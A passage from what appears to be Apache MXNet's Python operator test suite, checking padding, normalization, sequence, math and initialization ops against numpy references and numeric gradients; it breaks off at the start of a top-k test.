# mxnet result
grad = mx.nd.empty(shape, ctx = xpu, dtype=dtype)
exec1 = Y.bind(xpu, args = [x], args_grad = {'X': grad})
exec1.forward(is_train=True)
out = exec1.outputs[0]
# compare numpy + mxnet
assert_almost_equal(out, np_out)
# grad check
check_numeric_gradient(Y, [x.asnumpy()], numeric_eps=1e-2, rtol=1e-2)
@with_seed()
def test_pad():
ctx = default_context()
shape1 = (2, 3, 3, 5)
pad1 = (0, 0, 0, 0, 1, 2, 3, 4)
shape2 = (2, 3, 3, 5, 4)
pad2 = (0, 0, 0, 0, 1, 2, 3, 4, 3, 1)
# note: this op doesn't support ints yet. Add tests when supported
dtypes = ["float16", "float32", "float64"]
for dtype in dtypes:
check_pad_with_shape(shape1, ctx, pad1, 'constant', dtype)
check_pad_with_shape(shape1, ctx, pad1, 'edge', dtype)
check_pad_with_shape(shape2, ctx, pad2, 'constant', dtype)
check_pad_with_shape(shape2, ctx, pad2, 'edge', dtype)
check_pad_with_shape(shape1, ctx, pad1, 'reflect', dtype)
check_pad_with_shape(shape2, ctx, pad2, 'reflect', dtype)
def np_instance_norm(data, weight, bias, eps):
spatial_dims = data.shape[2::]
num_spatial_vals = np.prod(np.array(spatial_dims))
scale = 1/float(num_spatial_vals)
sum_axis = tuple(range(2, data.ndim))
mean = scale * np.sum(data, axis = sum_axis)
mean = np.reshape(np.repeat(mean, num_spatial_vals), data.shape)
var = scale * np.sum((data - mean)**2, axis = sum_axis)
var = np.reshape(np.repeat(var, num_spatial_vals), data.shape)
weightBatch = np.tile(weight, (data.shape[0], 1))
weightBatch = np.reshape(np.repeat(weightBatch, num_spatial_vals), data.shape)
biasBatch = np.tile(bias, (data.shape[0], 1))
biasBatch = np.reshape(np.repeat(biasBatch, num_spatial_vals), data.shape)
return weightBatch * (data - mean)/np.sqrt(var + eps) + biasBatch
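# Minimal sanity sketch (added for exposition, not one of the original tests; the helper name is
# hypothetical): with unit gamma and zero beta, np_instance_norm normalizes every
# (sample, channel) slice to roughly zero mean and unit variance.
def _demo_np_instance_norm():
    data = np.random.normal(size=(2, 3, 4, 5))
    out = np_instance_norm(data, np.ones(3), np.zeros(3), eps=1e-5)
    per_slice = out.reshape(2, 3, -1)
    assert np.allclose(per_slice.mean(axis=-1), 0.0, atol=1e-6)
    assert np.allclose(per_slice.var(axis=-1), 1.0, atol=1e-3)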
def check_instance_norm_with_shape(shape, xpu):
# bind with label
eps = 0.001
X = mx.symbol.Variable('X')
G = mx.symbol.Variable('G')
B = mx.symbol.Variable('B')
Y = mx.symbol.InstanceNorm(data=X, beta=B, gamma=G, eps=eps)
x = mx.random.normal(0, 1, shape, ctx=mx.cpu()).copyto(xpu)
gamma = mx.random.normal(0, 1, shape[1], ctx=mx.cpu()).copyto(xpu)
beta = mx.random.normal(0, 1, shape[1], ctx=mx.cpu()).copyto(xpu)
np_out = np_instance_norm(x.asnumpy(), gamma.asnumpy(), beta.asnumpy(), eps)
exec1 = Y.bind(xpu, args = {'X':x, 'G':gamma, 'B':beta})
exec1.forward(is_train=False)
out = exec1.outputs[0]
assert_almost_equal(out, np_out, rtol=1e-4, atol=1e-4)
check_numeric_gradient(Y, {'X':x.asnumpy(), 'G':gamma.asnumpy(), 'B':beta.asnumpy()},
numeric_eps=1e-2, rtol=1e-2, atol=1e-2)
@with_seed()
def test_instance_normalization():
check_instance_norm_with_shape((1, 1, 1), default_context())
check_instance_norm_with_shape((2, 1, 2), default_context())
check_instance_norm_with_shape((2,4,5,6), default_context())
check_instance_norm_with_shape((3,3,2,3,2,1,1), default_context())
def check_l2_normalization(in_shape, mode, dtype, norm_eps=1e-10):
ctx = default_context()
data = mx.symbol.Variable('data')
out = mx.symbol.L2Normalization(data=data, mode=mode, eps=norm_eps)
in_data = np.random.uniform(-1, 1, in_shape).astype(dtype)
# calculate numpy results
if mode == 'channel':
assert in_data.ndim > 2
np_norm = np.linalg.norm(in_data, axis=1) + norm_eps
np_norm = np.repeat(1. / np.expand_dims(np_norm, axis=1), in_data.shape[1], axis=1)
np_out = np.multiply(in_data, np_norm)
elif mode == 'spatial':
assert in_data.ndim > 2
s = in_data.shape
np_norm = np.linalg.norm(in_data.reshape((s[0], s[1], -1)), axis=2) + norm_eps
        np_norm = np.repeat(1. / np_norm[:, np.newaxis], in_data.size // (s[0] * s[1]), axis=2)
np_out = np.multiply(in_data, np_norm.reshape(s))
elif mode == 'instance':
assert in_data.ndim > 1
s = in_data.shape
np_norm = np.linalg.norm(in_data.reshape((s[0], -1)), axis=1) + norm_eps
        np_norm = np.repeat(1. / np_norm[:, np.newaxis], in_data.size // s[0], axis=1)
np_out = np.multiply(in_data, np_norm.reshape(s))
else:
raise RuntimeError('Unknown l2 normalization mode')
exe = out.simple_bind(ctx=ctx, data=in_data.shape)
output = exe.forward(is_train=True, data=in_data)
# compare numpy + mxnet
    assert_almost_equal(exe.outputs[0], np_out, rtol=1e-2 if dtype == 'float16' else 1e-5, atol=1e-5)
# check gradient
check_numeric_gradient(out, [in_data], numeric_eps=1e-3, rtol=1e-2, atol=5e-3)
@with_seed()
def test_l2_normalization():
for dtype in ['float16', 'float32', 'float64']:
for mode in ['channel', 'spatial', 'instance']:
nbatch = random.randint(1, 4)
nchannel = random.randint(3, 5)
height = random.randint(4, 6)
check_l2_normalization((nbatch, nchannel, height), mode, dtype)
width = random.randint(5, 7)
check_l2_normalization((nbatch, nchannel, height, width), mode, dtype)
def check_layer_normalization(in_shape, axis, eps, dtype=np.float32,
forward_check_eps=1E-3, backward_check_eps=1E-3,
npy_grad_check=True, finite_grad_check=True):
def npy_layer_norm(data, gamma, beta, axis=1, eps=1E-5):
if axis < 0:
axis += data.ndim
broadcast_shape = [1 for _ in range(data.ndim)]
broadcast_shape[axis] = data.shape[axis]
mean = data.mean(axis=axis, keepdims=True).astype(dtype)
var = data.var(axis=axis, keepdims=True).astype(dtype)
std = np.sqrt(var + dtype(eps)).astype(dtype)
out = np.reshape(gamma, broadcast_shape) * (data - mean) / std + \
np.reshape(beta, broadcast_shape)
return out
def npy_layer_norm_grad(data, gamma, out_grad, axis, eps):
if axis < 0:
axis += data.ndim
exclude_axis = tuple([ele for ele in range(data.ndim) if ele != axis])
data_mean = data.mean(axis=axis, keepdims=True)
data_var = data.var(axis=axis, keepdims=True)
data_std = np.sqrt(data_var + eps)
centered_data = (data - data_mean) / data_std
gamma_grad = (centered_data * out_grad).sum(axis=exclude_axis, keepdims=True)
beta_grad = out_grad.sum(axis=exclude_axis, keepdims=True)
w = out_grad * gamma.reshape([1 if i != axis else data.shape[axis] for i in range(data.ndim)])\
/ data_std
data_grad = w - w.mean(axis=axis, keepdims=True)\
- centered_data * (w * centered_data).mean(axis=axis, keepdims=True)
gamma_grad = gamma_grad.reshape((-1,))
beta_grad = beta_grad.reshape((-1,))
return data_grad, gamma_grad, beta_grad
ctx = default_context()
data = np.random.normal(0, 1, in_shape).astype(dtype)
gamma = np.random.normal(0, 1, (in_shape[axis],)).astype(dtype)
beta = np.random.normal(0, 1, (in_shape[axis],)).astype(dtype)
data_s = mx.symbol.Variable('data')
gamma_s = mx.symbol.Variable('gamma')
beta_s = mx.symbol.Variable('beta')
out_s = mx.symbol.LayerNorm(data=data_s, gamma=gamma_s, beta=beta_s, axis=axis, eps=eps)
exe = out_s.simple_bind(ctx, data=in_shape)
exe.arg_dict['data'][:] = data
exe.arg_dict['gamma'][:] = gamma
exe.arg_dict['beta'][:] = beta
out_nd = exe.forward()[0]
out = npy_layer_norm(data, gamma, beta, axis, eps)
assert_almost_equal(out, out_nd, forward_check_eps, forward_check_eps)
if finite_grad_check:
for req in ['write', 'add']:
check_numeric_gradient(out_s, {'data': data, 'gamma': gamma, 'beta': beta},
grad_nodes={'data': req, 'gamma': req, 'beta': req},
numeric_eps=1e-2, rtol=1e-2, atol=1e-2)
if npy_grad_check:
# Test for grad_req = write
out_grad = np.random.normal(0, 1, in_shape).astype(dtype)
exe = out_s.simple_bind(ctx, data=in_shape, grad_req='write')
exe.arg_dict['data'][:] = data
exe.arg_dict['gamma'][:] = gamma
exe.arg_dict['beta'][:] = beta
exe.forward()
exe.backward([mx.nd.array(out_grad, ctx=ctx)])
gt_data_grad, gt_gamma_grad, gt_beta_grad =\
npy_layer_norm_grad(data, gamma, out_grad, axis, eps)
assert_almost_equal(exe.grad_dict['data'].asnumpy(), gt_data_grad, backward_check_eps, backward_check_eps)
assert_almost_equal(exe.grad_dict['gamma'].asnumpy(), gt_gamma_grad, backward_check_eps, backward_check_eps)
assert_almost_equal(exe.grad_dict['beta'].asnumpy(), gt_beta_grad, backward_check_eps, backward_check_eps)
# Test for grad_req = add
out_grad = np.random.normal(0, 1, in_shape).astype(dtype)
init_data_grad = np.random.normal(0, 1, in_shape).astype(dtype)
init_gamma_grad = np.random.normal(0, 1, (in_shape[axis],)).astype(dtype)
init_beta_grad = np.random.normal(0, 1, (in_shape[axis],)).astype(dtype)
exe = out_s.simple_bind(ctx, data=in_shape, grad_req='add')
exe.arg_dict['data'][:] = data
exe.arg_dict['gamma'][:] = gamma
exe.arg_dict['beta'][:] = beta
exe.grad_dict['data'][:] = init_data_grad
exe.grad_dict['gamma'][:] = init_gamma_grad
exe.grad_dict['beta'][:] = init_beta_grad
exe.forward()
exe.backward([mx.nd.array(out_grad, ctx=ctx)])
gt_data_grad, gt_gamma_grad, gt_beta_grad = \
npy_layer_norm_grad(data, gamma, out_grad, axis, eps)
assert_almost_equal(exe.grad_dict['data'].asnumpy(),
gt_data_grad + init_data_grad, backward_check_eps, backward_check_eps)
assert_almost_equal(exe.grad_dict['gamma'].asnumpy(),
gt_gamma_grad + init_gamma_grad, backward_check_eps, backward_check_eps)
assert_almost_equal(exe.grad_dict['beta'].asnumpy(),
gt_beta_grad + init_beta_grad, backward_check_eps, backward_check_eps)
@with_seed()
def test_norm():
try:
import scipy
assert LooseVersion(scipy.__version__) >= LooseVersion('0.1')
from scipy.linalg import norm as sp_norm
except (AssertionError, ImportError):
print("Could not import scipy.linalg.norm or scipy is too old. "
"Falling back to numpy.linalg.norm which is not numerically stable.")
from numpy.linalg import norm as sp_norm
def l1norm(input_data, axis=0, keepdims=True):
return np.sum(abs(input_data), axis=axis, keepdims=keepdims)
def l2norm(input_data, axis=0, keepdims=True):
return sp_norm(input_data, axis=axis, keepdims=keepdims)
ctx = default_context()
data = mx.symbol.Variable('data')
in_data_dim = random_sample([2,3,4], 1)[0]
in_shape = rand_shape_nd(in_data_dim, dim=5)
epsilon = 1e-3
acc_type = {np.float16: np.float32, np.float32: np.float32, np.float64: np.float64,
np.int32: np.int32, np.int64: np.int64}
dtype_to_str = {np.float16: 'float16', np.float32: 'float32', np.float64: 'float64',
np.int32: 'int32', np.int64: 'int64'}
is_windows = sys.platform.startswith('win')
for enforce_safe_acc in ["1", "0"]:
if is_windows:
if enforce_safe_acc == "0":
break
enforce_safe_acc = "0" if "MXNET_SAFE_ACCUMULATION" not in os.environ else os.environ["MXNET_SAFE_ACCUMULATION"]
else:
os.environ["MXNET_SAFE_ACCUMULATION"] = enforce_safe_acc
for order in [1, 2]:
for dtype in [np.float16, np.float32, np.float64]:
for i in range(in_data_dim):
for out_dtype in ['float32', 'float64']:
backward_dtype = np.float32 if out_dtype == 'float32' else np.float64
accumulation_type = acc_type[dtype]
if enforce_safe_acc == "0":
backward_dtype = dtype
out_dtype = dtype_to_str[dtype]
accumulation_type = dtype
skip_backward = 'int' in out_dtype
in_data = np.random.uniform(-1, 1, in_shape).astype(accumulation_type)
in_data[abs(in_data) < epsilon] = 2 * epsilon
norm_sym = mx.symbol.norm(data=data, ord=order, axis=i, out_dtype=out_dtype, keepdims=True)
                        npy_out = l1norm(in_data, i) if order == 1 else l2norm(in_data, i)
                        npy_out_backward = np.sign(in_data) if order == 1 else in_data/npy_out
check_symbolic_forward(norm_sym, [in_data.astype(dtype)], [npy_out.astype(out_dtype)],
rtol=1e-2 if dtype == np.float16 else 1e-3,
atol=1e-4 if dtype == np.float16 else 1e-5, ctx=ctx, dtype=dtype)
if dtype is not np.float16 and not skip_backward:
check_symbolic_backward(norm_sym, [in_data.astype(dtype)],
[np.ones(npy_out.shape).astype(out_dtype)],
[npy_out_backward], rtol=1e-3, atol=1e-5, ctx=ctx,
dtype=backward_dtype)
# Disable numeric gradient https://github.com/apache/incubator-mxnet/issues/11509
# check gradient
if dtype is not np.float16 and not skip_backward:
check_numeric_gradient(norm_sym, [in_data], numeric_eps=epsilon,
rtol=1e-1, atol=1e-3, dtype=backward_dtype)
if i < in_data_dim-1:
norm_sym = mx.symbol.norm(data=data, ord=order, axis=(i, i+1), keepdims=True)
                            npy_out = l1norm(in_data, (i, i+1)) if order == 1 else l2norm(in_data, (i, i+1))
                            npy_out_backward = np.sign(in_data) if order == 1 else in_data/npy_out
check_symbolic_forward(norm_sym, [in_data], [npy_out.astype(dtype)],
rtol=1e-2 if dtype is np.float16 else 1e-3,
atol=1e-4 if dtype is np.float16 else 1e-5, ctx=ctx)
if dtype is not np.float16 and not skip_backward:
check_symbolic_backward(norm_sym, [in_data],
[np.ones(npy_out.shape).astype(out_dtype)],
[npy_out_backward.astype(out_dtype)],
rtol=1e-3, atol=1e-5, ctx=ctx, dtype=backward_dtype)
# check gradient
if dtype is not np.float16 and not skip_backward:
check_numeric_gradient(norm_sym, [in_data], numeric_eps=epsilon,
rtol=1e-1, atol=1e-3, dtype=backward_dtype)
def test_layer_norm():
for enforce_safe_acc in ["1", "0"]:
os.environ["MXNET_SAFE_ACCUMULATION"] = enforce_safe_acc
for dtype, forward_check_eps, backward_check_eps in zip([np.float16, np.float32, np.float64],
[1E-2, 1E-3, 1E-4],
[1E-2, 1E-3, 1E-4]):
if dtype != np.float16:
in_shape_l, finite_grad_check_l = [(10, 6, 5), (10, 10), (128 * 32, 512)], [True, True, False]
else:
in_shape_l, finite_grad_check_l = [(10, 6, 5), (10, 10)], [True, True] # large input + fp16 does not pass the forward check
for in_shape, finite_grad_check in zip(in_shape_l, finite_grad_check_l):
for axis in range(-len(in_shape), len(in_shape)):
for eps in [1E-2, 1E-3]:
if dtype == np.float16:
npy_grad_check = False
else:
npy_grad_check = True
check_layer_normalization(in_shape, axis, eps, dtype=dtype,
forward_check_eps=forward_check_eps,
backward_check_eps=backward_check_eps,
npy_grad_check=npy_grad_check,
finite_grad_check=finite_grad_check)
# Numpy Implementation of Sequence Ops
def sequence_last_numpy(array, lengths, axis):
# create new array of dims [batch, seqlen, ...]
array2 = np.moveaxis(array, axis, 1)
dims = array2.shape
if lengths is None:
return array2[:, -1]
lengths = list(lengths)
return np.array([array2[i, int(lengths[i]) - 1] for i in range(dims[0])])
def sequence_mask_numpy(array, lengths, axis, value):
if lengths is None:
return array
arrayMask = array.copy()
# conform to [batch, seqlen, ...]
arrayMask = np.moveaxis(arrayMask, axis, 1)
shape = arrayMask.shape
lengths = list(lengths)
for i in range(shape[0]):
arrayMask[i, int(lengths[i]):] = value
return np.moveaxis(arrayMask, 1, axis)
def sequence_reverse_numpy(array, lengths, axis):
rarray = array.copy()
# conform to [batch, seqlen, ...]
rarray = np.moveaxis(rarray, axis, 1)
shape = rarray.shape
if lengths is None:
lengths = [shape[1]] * shape[0]
lengths = list(lengths)
for i in range(shape[0]):
j = int(lengths[i])
rarray[i,:j] = rarray[i,:j][::-1]
return np.moveaxis(rarray, 1, axis)
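# Worked example (illustrative sketch, not one of the original tests; the helper name is
# hypothetical): with axis=0 the sequence axis comes first, so each length masks one batch column.
def _demo_sequence_mask_numpy():
    arr = np.arange(6).reshape(3, 2)  # seqlen=3, batch=2
    masked = sequence_mask_numpy(arr, lengths=[2, 1], axis=0, value=-1)
    assert_array_equal(masked, np.array([[0, 1], [2, -1], [-1, -1]]))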
def check_sequence_func(ftype, mask_value=0, axis=0):
# bind with label
xpu = default_context()
X = mx.symbol.Variable('X')
L = mx.symbol.Variable('L') # lengths
shapes = [(3, 4), (1, 1), (3, 4, 3, 1, 1)]
for seqlenQ in [True, False]:
for ary_dtype in [np.float32]:
for idx_dtype in [np.int32, np.float32]:
for s in shapes:
x = mx.random.uniform(-1, 1, s, ctx=mx.cpu()).astype(ary_dtype).copyto(xpu)
batch = s[1] if (axis == 0) else s[0]
seqlen = s[axis]
l_np = np.random.randint(1, seqlen + 1, batch)
l = mx.nd.array(l_np, ctx=mx.cpu(), dtype=idx_dtype).copyto(xpu)
if not seqlenQ:
l_np = None
args = {'data':X, 'use_sequence_length':seqlenQ, "axis":axis}
if seqlenQ:
args['sequence_length'] = L
if ftype == "last":
Y = mx.symbol.SequenceLast(**args)
np_out = sequence_last_numpy(x.asnumpy(), l_np, axis)
elif ftype == "mask":
args['value'] = mask_value
Y = mx.symbol.SequenceMask(**args)
np_out = sequence_mask_numpy(x.asnumpy(), l_np, axis, mask_value)
elif ftype == "reverse":
Y = mx.symbol.SequenceReverse(**args)
np_out = sequence_reverse_numpy(x.asnumpy(), l_np, axis)
fargs = [x, l] if seqlenQ else [x]
gargs = [x.asnumpy(), l_np] if seqlenQ else [x.asnumpy()]
check_symbolic_forward(Y, fargs, [np_out], dtype="asnumpy")
check_numeric_gradient(Y, gargs, grad_nodes={'X':'write'},
numeric_eps=1e-2, rtol=1e-2)
check_numeric_gradient(Y, gargs, grad_nodes={'X':'add'},
numeric_eps=1e-3, rtol=1e-2, atol=1E-4)
check_numeric_gradient(Y, gargs, grad_nodes={'X':'null'},
numeric_eps=1e-3, rtol=1e-2, atol=1E-4)
@with_seed()
@unittest.skip("Flaky test: https://github.com/apache/incubator-mxnet/issues/11395")
def test_sequence_last():
check_sequence_func("last", axis=0)
check_sequence_func("last", axis=1)
@with_seed()
def test_sequence_mask():
check_sequence_func("mask", axis = 0, mask_value=-2.3)
check_sequence_func("mask", axis = 1, mask_value=0.3)
def check_sequence_reverse(xpu):
# sample data
arr = np.array(
[[[ 1., 2., 3.],
[ 4., 5., 6.]],
[[ 7., 8., 9.],
[ 10., 11., 12.]],
[[ 13., 14., 15.],
[ 16., 17., 18.]]])
arr1 = np.array(
[[[ 13., 14., 15.],
[ 16., 17., 18.]],
[[ 7., 8., 9.],
[ 10., 11., 12.]],
[[ 1., 2., 3.],
[ 4., 5., 6.]]])
arr2 = np.array(
[[[ 7., 8., 9.],
[ 10., 11., 12.]],
[[ 1., 2., 3.],
[ 4., 5., 6.]],
[[ 13., 14., 15.],
[ 16., 17., 18.]]])
arr3 = np.array(
[[[ 7., 8., 9.],
[ 16., 17., 18.]],
[[ 1., 2., 3.],
[ 10., 11., 12.]],
[[ 13., 14., 15.],
[ 4., 5., 6.]]])
# test for matrix case
seq_len_1 = [1, 2, 2]
arr_4 = np.array([[7., 8., 9.], [16., 17., 5.4]], dtype=np.float32)
arr_5 = np.array([[7., 17., 5.4], [16., 8., 9.]], dtype=np.float32)
def test_wrapper(arr, xpu, sequence_length=None, use_sequence_length=False):
# MxNet symbol creation
seq = mx.sym.Variable('seq')
if sequence_length and use_sequence_length:
seq_len = mx.sym.Variable('seq_len')
else:
# ensure that both are disabled, not just one
seq_len=None
use_sequence_length=False
rev = mx.sym.SequenceReverse(data=seq, sequence_length=seq_len, use_sequence_length=use_sequence_length)
# MxNet symbol execution
if sequence_length:
bound = rev.bind(xpu, {'seq': mx.nd.array(arr), 'seq_len': mx.nd.array(sequence_length)})
else:
bound = rev.bind(xpu, {'seq': mx.nd.array(arr)})
fwd = bound.forward()
return fwd[0].asnumpy()
# test cases
assert_array_equal(test_wrapper(arr, xpu, use_sequence_length=False), arr1)
assert_array_equal(test_wrapper(arr, xpu, sequence_length=[3, 3], use_sequence_length=True), arr1)
assert_array_equal(test_wrapper(arr, xpu, sequence_length=[2, 2], use_sequence_length=True), arr2)
assert_array_equal(test_wrapper(arr, xpu, sequence_length=[2, 3], use_sequence_length=True), arr3)
assert_array_equal(test_wrapper(arr_4, xpu, sequence_length=seq_len_1, use_sequence_length=True), arr_5)
@with_seed()
def test_sequence_reverse():
check_sequence_func("reverse", axis=0)
check_sequence_reverse(mx.cpu())
def mathematical_core_binary(name,
forward_mxnet_call,
forward_numpy_call,
backward_numpy_call1,
backward_numpy_call2,
data1_init=2.,
data2_init=3.,
grad_init=2.):
data1 = mx.symbol.Variable('data1')
data2 = mx.symbol.Variable('data2')
shape = (3, 4)
data_tmp1 = np.random.rand(3, 4)
data_tmp2 = np.random.rand(3, 4)
data_tmp1[:] = data1_init
data_tmp2[:] = data2_init
arr_data1 = mx.nd.array(data_tmp1)
arr_data2 = mx.nd.array(data_tmp2)
arr_grad1 = mx.nd.empty(shape)
arr_grad2 = mx.nd.empty(shape)
test = forward_mxnet_call(data1, data2)
exe_test = test.bind(default_context(), args=[arr_data1, arr_data2], args_grad=[arr_grad1, arr_grad2])
exe_test.forward(is_train=True)
out = exe_test.outputs[0]
npout = forward_numpy_call(data_tmp1, data_tmp2)
assert_almost_equal(out, npout)
out_grad = mx.nd.empty(shape)
out_grad[:] = grad_init
exe_test.backward(out_grad)
npout_grad = np.ones(shape)
npout_grad[:] = grad_init
npout_grad1 = npout_grad * backward_numpy_call1(data_tmp1, data_tmp2)
npout_grad2 = npout_grad * backward_numpy_call2(data_tmp1, data_tmp2)
assert_almost_equal(arr_grad1, npout_grad1)
assert_almost_equal(arr_grad2, npout_grad2)
def mathematical_core(name, forward_mxnet_call, forward_numpy_call, backward_numpy_call, data_init=5., grad_init=2.):
data = mx.symbol.Variable('data')
shape = (3, 4)
data_tmp = np.ones(shape)
data_tmp[:] = data_init
arr_data = mx.nd.array(data_tmp)
arr_grad = mx.nd.empty(shape)
arr_grad[:] = 3
test = forward_mxnet_call(data)
exe_test = test.bind(default_context(), args=[arr_data], args_grad=[arr_grad])
exe_test.forward(is_train=True)
out = exe_test.outputs[0]
npout = forward_numpy_call(data_tmp)
assert_almost_equal(out, npout)
out_grad = mx.nd.empty(shape)
out_grad[:] = grad_init
npout_grad = out_grad.asnumpy()
temp = backward_numpy_call(data_tmp)
npout_grad = npout_grad * temp
exe_test.backward(out_grad)
assert_almost_equal(arr_grad, npout_grad)
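# Usage sketch (illustrative only, not part of the original tests): a unary op is checked by
# pairing its symbol with the numpy forward and the analytic derivative, e.g.
#   mathematical_core("square", lambda x: mx.sym.square(x), lambda x: np.square(x), lambda x: 2 * x)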
@with_seed()
def test_special_functions_using_scipy():
try:
from scipy import special as scipy_special
    except ImportError:
print("Could not import scipy. Skipping unit tests for special functions")
return
# gamma
mathematical_core("gamma", lambda x: mx.sym.gamma(x), lambda x: scipy_special.gamma(x),
lambda x: scipy_special.gamma(x) * scipy_special.psi(x), 0.5, 0.5)
# gammaln
mathematical_core("gammaln", lambda x: mx.sym.gammaln(x), lambda x: scipy_special.gammaln(x),
lambda x: scipy_special.psi(x), 0.5, 0.5)
# erf
mathematical_core("erf", lambda x: mx.sym.erf(x), lambda x: scipy_special.erf(x),
lambda x: 2.0 / math.sqrt(math.pi) * np.exp(-(x ** 2)), 0.5, 0.5)
# erfinv
mathematical_core("erfinv", lambda x: mx.sym.erfinv(x), lambda x: scipy_special.erfinv(x),
lambda x: 0.5 * math.sqrt(math.pi) * np.exp(scipy_special.erfinv(x) ** 2), 0.5, 0.5)
def rounding(name, forward_mxnet_call, forward_numpy_call, data_init=5., grad_init=2.):
data = mx.symbol.Variable('data')
shape = (3, 4)
data_tmp = np.ones(shape)
data_tmp[:] = data_init
arr_data = mx.nd.array(data_tmp)
test = forward_mxnet_call(data)
exe_test = test.bind(default_context(), args=[arr_data])
exe_test.forward(is_train=True)
out = exe_test.outputs[0]
npout = forward_numpy_call(data_tmp)
assert_almost_equal(out, npout)
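# Usage sketch (illustrative only): rounding ops have no useful gradient, so the helper above
# checks the forward pass only, e.g. rounding("floor", lambda x: mx.sym.floor(x), lambda x: np.floor(x)).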
@with_seed()
def test_mathematical():
# rsqrt
mathematical_core("rsqrt",
lambda x: mx.sym.rsqrt(x),
lambda x: 1 / np.sqrt(x),
lambda x: -(1.0 / (2.0 * x * np.sqrt(x))))
# tan
mathematical_core("tan", lambda x: mx.sym.tan(x), lambda x: np.tan(x), lambda x: np.tan(x) ** 2 + 1)
# arcsin
mathematical_core("arcsin", lambda x: mx.sym.arcsin(x), lambda x: np.arcsin(x),
lambda x: 1. / (1. - x ** 2) ** (1. / 2.), 0.5, 0.5)
# arccos
mathematical_core("arccos", lambda x: mx.sym.arccos(x), lambda x: np.arccos(x),
lambda x: -1. / (1. - x ** 2.) ** (1. / 2.), 0.5, 0.5)
# arctan
mathematical_core("arctan", lambda x: mx.sym.arctan(x), lambda x: np.arctan(x),
lambda x: 1. / (x ** 2. + 1.), 0.5, 0.5)
# hypot
mathematical_core_binary("hypot",
lambda x, y: mx.sym.hypot(x, y),
lambda x, y: np.hypot(x, y),
lambda x, y: x / np.hypot(x, y),
lambda x, y: y / np.hypot(x, y),
0.5, 0.5, 0.5)
# hypot scalar
mathematical_core("hypot scalar",
lambda x: mx.sym.hypot(x, 3),
lambda x: np.hypot(x, 3),
lambda x: x / np.hypot(x, 3),
0.5, 0.5)
# degrees
mathematical_core("degrees",
lambda x: mx.sym.degrees(x),
lambda x: np.degrees(x),
lambda x: 180./np.pi,
0.5, 0.5)
# radians
mathematical_core("radians",
lambda x: mx.sym.radians(x),
lambda x: np.radians(x),
lambda x: np.pi / 180.,
0.6, 1)
# sinh
mathematical_core("sinh", lambda x: mx.sym.sinh(x), lambda x: np.sinh(x), lambda x: np.cosh(x))
# cosh
mathematical_core("cosh", lambda x: mx.sym.cosh(x), lambda x: np.cosh(x), lambda x: np.sinh(x), 5, 5)
# tanh
mathematical_core("tanh", lambda x: mx.sym.tanh(x), lambda x: np.tanh(x), lambda x: 1. - np.tanh(x) ** 2, 0.5, 1)
# arcsinh
mathematical_core("arcsinh", lambda x: mx.sym.arcsinh(x), lambda x: np.arcsinh(x),
lambda x: 1./(x**2 + 1.)**(1./2.))
# arccosh
mathematical_core("arccosh", lambda x: mx.sym.arccosh(x), lambda x: np.arccosh(x),
lambda x: 1./(x**2 - 1.)**(1./2.))
# arctanh
mathematical_core("arctanh", lambda x: mx.sym.arctanh(x), lambda x: np.arctanh(x),
lambda x: -1./(x**2 - 1.), 0.5)
# log1p
mathematical_core("log1p", lambda x: mx.sym.log1p(x), lambda x: np.log1p(x),
lambda x: 1. / (1.0 + x), 0.5, 0.5)
# expm1
mathematical_core("expm1", lambda x: mx.sym.expm1(x), lambda x: np.expm1(x),
lambda x: np.exp(x), 0.5, 0.5)
# log10
mathematical_core("log10", lambda x: mx.sym.log10(x), lambda x: np.log10(x),
lambda x: 1. / (x * np.log(10.)))
# log2
mathematical_core("log2", lambda x: mx.sym.log2(x), lambda x: np.log2(x),
lambda x: 1. / (x * np.log(2.)))
# rint
rounding("rint", lambda x: mx.sym.rint(x), lambda x: np.rint(x))
# fix
rounding("fix", lambda x: mx.sym.fix(x), lambda x: np.fix(x))
@with_seed()
def test_clip():
data = mx.symbol.Variable('data')
shape = (30, 30)
data_tmp = np.random.uniform(-1, 1, shape).astype('float32')
test = mx.sym.clip(data, a_max=0.6, a_min=-0.6)
check_symbolic_forward(test, [data_tmp], [np.clip(data_tmp, -0.6, 0.6)])
check_symbolic_backward(test, [data_tmp], [np.ones(shape)],
[np.where(data_tmp <= 0.6, [1], [0]) * np.where(data_tmp >= -0.6, [1], [0])])
# Test monitor on symbol using clip
def simple_callback(name, arr):
pass
exe = test.simple_bind(ctx=mx.current_context(), data=shape)
exe.set_monitor_callback(simple_callback, monitor_all=True)
exe.forward(is_train=True)
exe.backward(out_grads=mx.nd.ones(shape))
mx.nd.waitall()
@with_seed()
def test_init():
def test_basic_val_init(sym_func, np_func, shape, dtype):
x = sym_func(shape=shape, dtype=dtype)
exe = x.bind(default_context(), args=[], args_grad=[])
exe.forward(is_train=True)
assert_almost_equal(exe.outputs[0], np_func(shape=shape, dtype=dtype))
assert exe.outputs[0].asnumpy().dtype == dtype
def test_arange():
# General Random Tests
dtype_list = [np.float32, np.float64, np.int32, np.uint8]
config_list = [(10,),
(0, 10),
(5, 100, 4),
(50, -50, -2),
(-100, 100, 1),
(1.3, 456.6, 1.3)]
for dtype in dtype_list:
for config in config_list:
repeats = random.choice([1, 3])
np_out = np.repeat(np.arange(*config, dtype=dtype), repeats)
nd_out = mx.nd.arange(*config, repeat=repeats, dtype=dtype)
assert_almost_equal(np_out, nd_out)
def test_arange_inferstop():
s = mx.sym.arange(start=0, stop=None, infer_range=True)
s = mx.sym.elemwise_add(s, mx.sym.zeros(shape=[5]))
exe = s.bind(ctx=mx.cpu(), args={})
exe.forward()
assert_almost_equal(exe.outputs[0], np.array([0,1,2,3,4]))
def test_arange_like():
shape_list = [(10,), (10, 20), (10, 20, 30), (10, 20, 30, 40)]
axis_list = [0, -1]
for sh in shape_list:
for axis in axis_list:
val = np.random.rand(*sh)
data = mx.nd.array(val)
nd_out = mx.nd.contrib.arange_like(data, start=0, axis=axis)
np_out = np.arange(start=0, stop=sh[axis])
assert_almost_equal(nd_out.asnumpy(), np_out)
def test_arange_like_without_axis():
shape_list = [(10,), (10, 20), (10, 20, 30), (10, 20, 30, 40)]
for sh in shape_list:
val = np.random.rand(*sh)
data = mx.nd.array(val)
nd_out = mx.nd.contrib.arange_like(data, start=0)
np_out = np.arange(start=0, stop=val.size)
assert_almost_equal(nd_out.asnumpy(), np_out.reshape(sh))
test_basic_val_init(mx.sym.zeros, np.zeros, (3, 4), np.float32)
test_basic_val_init(mx.sym.ones, np.ones, 3, np.int32)
test_basic_val_init(mx.sym.ones, np.ones, (2, 2, 3), np.float16)
test_arange()
test_arange_inferstop()
test_arange_like()
test_arange_like_without_axis()
@with_seed()
def test_order():
ctx = default_context()
def gt_topk(dat, axis, ret_typ, k, is_ascend):
